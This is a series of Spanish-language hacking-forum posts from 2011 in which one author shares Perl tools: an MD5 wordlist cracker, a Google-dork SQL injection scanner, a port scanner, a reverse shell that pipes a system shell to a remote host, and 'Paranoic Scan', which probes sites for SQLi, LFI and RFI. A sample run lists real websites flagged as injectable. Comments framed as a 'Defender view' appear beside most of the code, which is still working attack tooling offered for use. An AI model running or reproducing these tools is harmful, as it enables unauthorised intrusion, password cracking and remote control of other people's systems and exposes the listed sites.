
Mensajes - BigBear

#481
Perl / [Perl] Search MD5
Julio 03, 2011, 09:50:07 PM
Hola a todos

Hoy acabo de hacer un crackeador de hashes MD5, con salt o sin él.
Esta versión es con ventanas, usando Tk.

Código: perl

#Search MD5
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

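# Detach from the console window when running on Windows.
# `use` is resolved at compile time no matter which branch it sits in, so the
# original tried to load Win32::Console on every platform and aborted where
# the module is missing. `require` defers the load until the check has passed.
if ($^O eq 'MSWin32') {
    require Win32::Console;
    Win32::Console::Free();
}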

my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

# "Browse" button callback: show a file-selection dialog rooted at "/" and
# copy the chosen path into the wordlist entry.
sub oper {
    $w->update;
    $browse = $w->FileSelect(-directory => "/");
    my $chosen = $browse->Show;
    $o->configure(-text => $chosen);
}

# "About" button callback: open a fixed-size window with the program credits
# and an Exit button that destroys only that window.
sub about {
    my $about_win = MainWindow->new(-background=>"black");
    $about_win->geometry("300x180+20+20");
    $about_win->title("About");
    $about_win->resizable(0,0);

    $about_win->Label(
        -text       => "\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",
        -background => "black",
        -foreground => "yellow",
    )->pack();

    $about_win->Button(
        -text             => "Exit",
        -foreground       => "yellow",
        -background       => "black",
        -command          => [$about_win => 'destroy'],
        -activebackground => 'yellow',
    )->pack()
}

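# "Crack!" button callback: dictionary check of one MD5 hash.
# Reads the hash, the optional salt and the wordlist path from the main
# window, opens a status window, then hashes every word with the salt appended
# and stops at the first word whose digest equals the target.
sub crack {
    my $hash     = $hash->get;
    my $salt     = $salt->get;
    my $wordlist = $o->get;

    my $console = MainWindow->new(-background=>"black");
    $console->title("Status");
    $console->resizable(0,0);
    $console->geometry("400x320+20+20");
    $console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
    my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
    $console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);

    # "X" is the placeholder the salt entry is pre-filled with: it means no salt.
    $salt = "" if $salt eq "X";

    # The original used `next` here, which is only valid inside a loop; a plain
    # return ends the callback cleanly.
    unless (-f $wordlist) {
        $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");
        return;
    }

    # An MD5 digest is exactly 32 hexadecimal characters.
    unless ($hash =~ /\A[0-9a-fA-F]{32}\z/) {
        $box->insert('end',"\n\n[-] The hash is incorrect\n\n");
        return;
    }

    $box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");

    # Three-argument open with a lexical handle: the path comes from a text
    # entry and must never be parsed for a mode prefix or a pipe character.
    my $fh;
    unless (open $fh, '<', $wordlist) {
        $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");
        return;
    }

    my $target = lc $hash;    # md5_hex returns lower-case hex
    my $found  = 0;           # lexical, so an earlier run cannot leak its result
    while (my $pass = <$fh>) {
        chomp $pass;
        $console->update;
        $box->insert('end',"[+] Trying with $pass\n");
        # Plain function call: invoked as a class method, md5_hex would receive
        # the class name as its first data argument and hash that as well.
        my $digest = Digest::MD5::md5_hex($pass.$salt);
        # String comparison: `==` compares only the leading numeric part of
        # each hex string and reports matches that are not matches.
        if ($digest eq $target) {
            print "\a\a";
            $box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");
            $found = 1;
            last;
        }
    }
    close $fh;

    $box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n") unless $found;
    return;
}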

MainLoop;




Si lo quieren descargar desde sourceforge

Código: php

https://sourceforge.net/projects/searchmd5x/


#482
Perl / [Perl] Search in google for scan SQLI
Julio 03, 2011, 09:49:49 PM
Un simple scanner de SQLI para usar en google

Código: perl

#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;

# Shared HTTP client. Every request the script sends carries this fixed
# Firefox 2 User-Agent string and uses a 5-second timeout, which makes the
# string a usable search term when reviewing web-server access logs.
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

# Interactive input: a search query and a page limit, both read from STDIN and
# passed on without validation.
print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
# Each result that contains "=" is cut after its last "=" (the match is greedy)
# and the remaining prefix is handed to sql().
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
# copyright() ends the process with exit(1), so the read below is never reached.
copyright();
<stdin>;

# Collect result URLs for a search query.
# $a is the query, $b the highest "start" offset to request; result pages are
# fetched in steps of 10 beginning at offset 10. Returns the de-duplicated list.
# Note: `my ($a,$b)` shadows the variables sort() uses, and $pages, $code, @url
# and @founds are not declared in this sub - @url and @founds are package
# globals that keep growing if the sub is called twice.
# NOTE(review): $pages looks like the file-level lexical read from STDIN, which
# this loop would overwrite - confirm.
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
# The query is concatenated into the URL as typed, without URL-encoding.
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
# Keep only the links that point at the search engine's cache host.
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

# In a cache link the original URL sits between the second ":" after "cache"
# and the next "+"; that part is what gets collected.
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

# The right-hand side still refers to the package array; the new lexical only
# comes into scope after this statement.
my @founds = repes(@founds);

return @founds;
}


# Probe one URL prefix (ending in "=") for error-based SQL injection.
# The request appends the literal "-1+union+select+666--" to the prefix and the
# response body is searched for MySQL's "different number of columns" error.
# Defender view: a hit needs two things from the target - the parameter reaching
# the query unescaped, and the database error being echoed to the client.
# Parameterised queries remove the first and generic error pages the second.
# The appended literal is also a usable search string for access-log review.
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
# "\a" rings the terminal bell on every reported URL.
print "[+] SQLI : $page\a\n";
}}

# Extract link attribute values from the HTML document in $_[0].
# HTML::LinkExtor calls agarrar() once per link-bearing tag; agarrar() appends
# the attribute values to @links, which is returned afterwards.
# @links is not declared here, so it is a package array that is never cleared:
# a second call also returns the links gathered by the first one.
sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

# A named sub written inside another sub is still an ordinary package-level
# sub; it does not close over anything in get_links.
sub agarrar {
# $a is the tag name (unused), %b maps attribute names to URLs.
my ($a,%b) = @_;
push(@links,values %b);
}
}

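# Return the arguments with duplicates removed, keeping first-seen order.
# The seen-set and the result list are lexical, so every call starts clean.
# The original kept both in package globals (%repe, @limpio) and therefore
# also returned, and filtered against, the items of every earlier call.
sub repes {
    my %seen;
    my @unique;
    for my $item (@_) {
        push @unique, $item unless $seen{$item}++;
    }
    return @unique;
}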

sub head {
print "\n\n-- == Search Google == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
#483
Perl / [Perl] Scan Port By Doddy H
Julio 03, 2011, 09:49:34 PM
Hola a todos, acá les traigo un simple escáner de puertos
hecho en Perl.

Código: perl

#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos

use IO::Socket;

# Entry point: print the banner, then either scan the host given as the first
# argument or show the usage line. copyright() ends the program in both cases.
head();
if ($ARGV[0]) {
    scan($ARGV[0]);
}
else {
    print "\n\n[sintax] : ".$0." <ip> \n\n";
}
copyright();

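# Attempt a TCP connection to a fixed set of six well-known ports on the host
# in $_[0] and print each port that accepts it, with its service name.
sub scan {
    my ($host) = @_;

    my %ports = (
        "21"   => "ftp",
        "22"   => "ssh",
        "25"   => "smtp",
        "80"   => "http",
        "110"  => "pop3",
        "3306" => "mysql",
    );

    print "\n[+] Scanning $host\n\n\n";

    # Numeric sort: hash order is randomised, so the original printed the
    # ports in a different order from one run to the next.
    for my $port (sort { $a <=> $b } keys %ports) {
        # Direct method call instead of the indirect-object form
        # `new IO::Socket::INET(...)`, which Perl can misparse.
        my $sock = IO::Socket::INET->new(
            PeerAddr => $host,
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5,
        ) or next;

        print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
        close $sock;    # release the connection as soon as the result is known
    }
    return;
}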

sub head {
print "\n\n-- == Scan Port == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}



Ejemplo de uso

Código: php

perl scan.pl localhost
#484
Perl / [Perl] Reverse Shell By Doddy
Julio 03, 2011, 09:49:16 PM
Hola a todos.

Hoy traigo un simple reverse shell; en esta versión solo puede conectarse a un servidor que tenga netcat,
después ofrece información según el sistema operativo de quien ejecutó el script.
En la versión 0.2 le agregaré detección de kernel y su posible exploit.

Código: perl

#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

# Entry point. Exactly two arguments (host, port) are required; otherwise the
# usage line is printed and the process exits with status 1.
print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
# These three lines still go to the local terminal.
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
# conectar() re-binds STDIN, STDOUT and STDERR to the outbound socket, so
# everything tipo() prints or spawns afterwards talks to the remote end.
conectar($ARGV[0],$ARGV[1]);
tipo();
}

# Open an outbound TCP connection to host $_[0], port $_[1], on the bareword
# handle REVERSE and duplicate that socket onto STDIN, STDOUT and STDERR.
# Defender view: after this sub returns, the process is an interpreter whose
# three standard descriptors all refer to one outbound TCP socket. That state
# is visible to host telemetry that records per-process file descriptors and
# is unusual for an interactively started script.
sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

# Choose the platform branch from $^O, print host details and start a command
# interpreter through system(). It is called after conectar(), so the child
# inherits the socket-backed standard handles.
# Defender view: the observable event is a perl process spawning a command
# interpreter as a child while its stdio is a network socket. Parent/child
# process lineage rules in endpoint monitoring are written for this pattern.
sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root(); 
system("bin/bash");
}
}

# Print the Windows domain name, OS name and login name of the account running
# the script, using the Win32:: functions. When called from tipo() the output
# goes to whatever STDOUT has been re-bound to.
sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

# Print a heading and run `uname -a` through system(); the command's output
# goes to the current STDOUT.
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}

#The End

#485
Perl / [Perl] PasteBin Uploader
Julio 03, 2011, 09:49:04 PM
Bueno, acá he terminado un programa que los ayudará a publicar sus programas
en Pastebin de una forma rápida y sin ganas xDDD

Entonces , este programa tiene dos opciones :

  • Publica solo un archivo
  • Publica todos los archivos en un directorio

    Tambien detecta el tipo de extension para poder publicar el codigo en su respectivo tipo de codigo

    Código: perl

    #!usr/bin/perl
    #Paste Bin Uploader (C) Doddy Hackman 2011

    use LWP::UserAgent;
    use HTTP::Request::Common;

    my $nave = LWP::UserAgent->new();
    $nave->timeout(10);
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

    menu();

    sub menu {

    clean();
    header();

    print "\n\n[Options]\n\n";
    print "[1] : Upload a file\n";
    print "[2] : Upload a directory\n";
    print "[3] : Exit\n\n";
    print "[Option] : ";
    chomp(my $op = <stdin>);

    if ($op eq 1) {
    print "\n\n[File] : ";
    chomp(my $file = <stdin>);

    if (-f $file)  {

    ($name,$exta) =verfile($file);

    my $ext = extensiones($exta);

    if ($ext ne "Yet") {


    $code = openfile($file);

    $re = lleva($name,$code,$ext);

    print "\n\n[+] File : $file\n";
    print "[+] Link : ".$re."\n";

    savefile("uploads_paste.txt","\n[+] File : $file");
    savefile("uploads_paste.txt","[+] Link : ".$re);

    }


    } else {
    print "\n\n[-] Error\n\n";
    }
    reload();
    }

    elsif ($op eq 2) {

    print "\n\n[Directory] : ";
    chomp(my $dir = <stdin>);

    if (-d $dir) {

    my @files = verdir($dir);

    print "\n\n[+] Loading directory\n";

    for my $file(@files) {

    chomp $file;

    my ($name,$exta) =verfile($file);

    my $ext = extensiones($exta);

    if ($ext ne "Yet") {

    my $code = openfile($dir."/".$file);

    $re = lleva($name,$code,$ext);

    print "\n\n[+] File : $file\n";
    print "[+] Link : ".$re."\n";

    savefile("uploads_paste.txt","\n[+] File : $file");
    savefile("uploads_paste.txt","[+] Link : ".$re);

    }
    }
    } else {
    print "\n\n[-] Error\n\n";
    }

    reload();
    }

    elsif ($op eq 3) {
    copyright();
    <stdin>;
    exit(1);
    }

    else {
    menu();
    }
    }

    sub copyright {
    print "\n\n(C) Doddy Hackman 2011\n\n";
    }

    sub header {

    print q(

    PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP
    PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
    PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
    PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP
    PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP   
    PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP   
    PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP   


    );

    }

    sub clean {
    system("cls");
    }



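    # Return the names (not the full paths) of the regular files that sit
    # directly inside the directory $_[0]; an unreadable directory gives an
    # empty list.
    # The original collected into the package array @files, so a second call
    # also returned the first call's names, and it never closed the handle.
    sub verdir {
        my ($dir) = @_;

        opendir(my $dh, $dir) or return;
        my @names = grep { -f $dir."/".$_ } readdir $dh;
        closedir $dh;

        return @names;
    }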

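    # Split a file name at its last dot and return (base name, extension).
    # Returns an empty list when the name has no dot or when the text after
    # the last dot contains a path separator.
    # The original matched with /g against $_[0], which is an alias of the
    # caller's variable: the match position stored on that variable made a
    # second call with the same variable fail.
    sub verfile {
        my ($file) = @_;
        if (defined $file && $file =~ m{\A(.*)\.([^./\\]*)\z}s) {
            return ($1, $2);
        }
        return;
    }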

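    # Map a file extension to the paste syntax name, case-insensitively.
    # Returns "" for txt (plain text) and the sentinel "Yet" for any extension
    # that is not in the table; callers skip files that map to "Yet".
    # The original used unanchored patterns, so any extension that merely
    # contained "pl", "py", "rb", "php" or "txt" was accepted (for example
    # "tpl" was uploaded as perl), and it wrote its result to a package global.
    sub extensiones {
        my ($ext) = @_;

        my %format_for = (
            py  => "python",
            pl  => "perl",
            rb  => "ruby",
            php => "php",
            txt => "",
        );

        my $key = defined $ext ? lc $ext : "";
        return exists $format_for{$key} ? $format_for{$key} : "Yet";
    }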

    sub reload {
    print "\n\n[?] Enter for continue\n\n";
    <stdin>;
    menu();
    }



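    # Append the line $_[1] to the file logs/<$_[0]>, relative to the current
    # directory. Returns the result of close, or nothing when the file cannot
    # be opened (a warning is printed in that case).
    # Three-argument open with a lexical handle replaces the original
    # two-argument open on a bareword, which ignored failures such as a
    # missing logs/ directory and lost the line silently.
    sub savefile {
        my ($name, $line) = @_;
        my $path = "logs/".$name;

        my $fh;
        unless (open $fh, '>>', $path) {
            warn "savefile: cannot append to $path: $!\n";
            return;
        }
        print {$fh} $line."\n";
        return close $fh;
    }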

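    # Return the whole content of the file $_[0] as one string, or undef when
    # the file cannot be opened.
    # Three-argument open: with the original two-argument form the name was
    # parsed by Perl, so surrounding whitespace was stripped and a name
    # beginning with a mode character or ending in "|" was not opened as a
    # plain file for reading.
    sub openfile {
        my ($path) = @_;

        open(my $fh, '<', $path) or return;
        my $content = do { local $/; <$fh> };
        close $fh;

        return $content;
    }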

    # Upload one paste and return the raw response body.
    # Arguments: $_[0] paste name, $_[1] paste text, $_[2] syntax format.
    # NOTE(review): the request goes to an http:// URL and sets paste_private
    # to "public" with paste_expire_date 'N' (presumably "never" - confirm
    # against the API). Every uploaded file therefore becomes world-readable,
    # and the directory option uploads each file with a recognised extension,
    # so any credentials or keys inside those files are disclosed.
    sub lleva {
    return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
    }

    # ¿ The End ?
#486
Perl / [Perl] Pass Cracker By DOddy H
Julio 03, 2011, 09:48:52 PM
Hola , aca les dejo un simple programa para buscar la decodificacion de un hash md5

Código: perl

#!usr/bin/perl
#Pass Cracker 1.0
#(C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();

# Look up the MD5 hash in $_[0] on a list of third-party web services and
# print capture group 1 of each service's result pattern when it matches.
# NOTE(review): the hash is sent to every listed site over plain http. Doing
# this with a hash taken from a production system discloses it to each site
# operator and to anyone on the network path; audit hashes offline instead.
sub crackit {

print "\n[+] Cracking $_[0]\n\n";

# One entry per service, keyed by URL: 'tipo' is the HTTP method, 'variables'
# the form fields for POST, 'regex' the pattern applied to the response.
# NOTE(review): the 'variables' values and most 'regex' values are
# single-quoted strings, so $_[0] inside them is not interpolated here, and
# tomar() receives a string where it dereferences a hash - presumably not what
# was intended; confirm before relying on any result.
my %hash = (
   
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

# Services are visited in hash order, which is not stable between runs.
for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
# GET services take the hash appended directly to the URL.
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
}
}
print "\n[+] Finish\n";
}

sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?


Ejemplo de uso

Código: php

perl crack.pl <hash>
#487
Perl / [Perl] Paranoic Scan By Doddy H
Julio 03, 2011, 09:48:39 PM
Hola.

Hoy traigo un programa que he estado haciendo porque estaba harto de ir probando cada
web que encontraba en Google para saber si tenía la vulnerabilidad que quería.
Así que por eso hice esta tool, con las siguientes opciones:

* Permite escanear un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear


Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOSURE



Ejemplo de uso


Código: perl




@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

[Status] : Finish



(C) Doddy Hackman 2010



Codigo

Código: perl

#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010

use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");





sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
}
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;


sub toma {
return $nave->request (GET $_[0])->content;
}


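# Append the line $_[1] to the file logs/<$_[0]>, relative to the current
# directory. Returns the result of close, or nothing when the file cannot be
# opened (a warning is printed in that case).
# Three-argument open with a lexical handle replaces the original two-argument
# open on a bareword, which ignored failures such as a missing logs/ directory.
sub savefile {
    my ($name, $line) = @_;
    my $path = "logs/".$name;

    my $fh;
    unless (open $fh, '>>', $path) {
        warn "savefile: cannot append to $path: $!\n";
        return;
    }
    print {$fh} $line."\n";
    return close $fh;
}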

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
}
return(repes(@r));
}


# Probe one URL prefix (ending in "=") for error-based SQL injection and log a
# hit to logs/sql-logs.txt.
# The request appends the literal "-1+union+select+666--" and the response is
# searched for MySQL's "different number of columns" error text.
# Defender view: the check only succeeds when the parameter reaches the query
# unescaped and the database error is echoed to the client. Parameterised
# queries and generic error pages each break it, and the appended literal is a
# usable search string for access-log review.
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

# Probe one URL prefix for remote file inclusion and log a hit to
# logs/rfi-logs.txt.
# The parameter value is replaced by the address of an unrelated public site
# (written with a single slash after "http:") and the response is searched for
# that site's banner text; finding it means the server fetched and embedded
# the remote page.
# Defender view: this depends on the application passing a request parameter
# to an include/fetch call and on the runtime allowing remote URLs there (in
# PHP, the allow_url_include setting). Outbound requests from a web server to
# an unrelated site, triggered by an inbound request, are the network trace.
sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { # This is real knowledge xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

# Probe one URL prefix for local file inclusion and log a hit to
# logs/lfi-logs.txt.
# A single quote is sent as the parameter value and the response is searched
# for a "No such file or directory in <b>...</b> on line" warning, i.e. a
# file-open error that the server printed into the page.
# Defender view: the signal is the leaked warning itself. With error display
# turned off in production the pattern cannot match, but the underlying flaw,
# a request parameter used as a file path, still has to be fixed by mapping
# parameters to an allow-list of files.
sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}


# Probe one URL prefix for source disclosure through a download script and log
# a hit to logs/fpd-logs.txt.
# The URL's own path (without the leading "/") is sent as the parameter value,
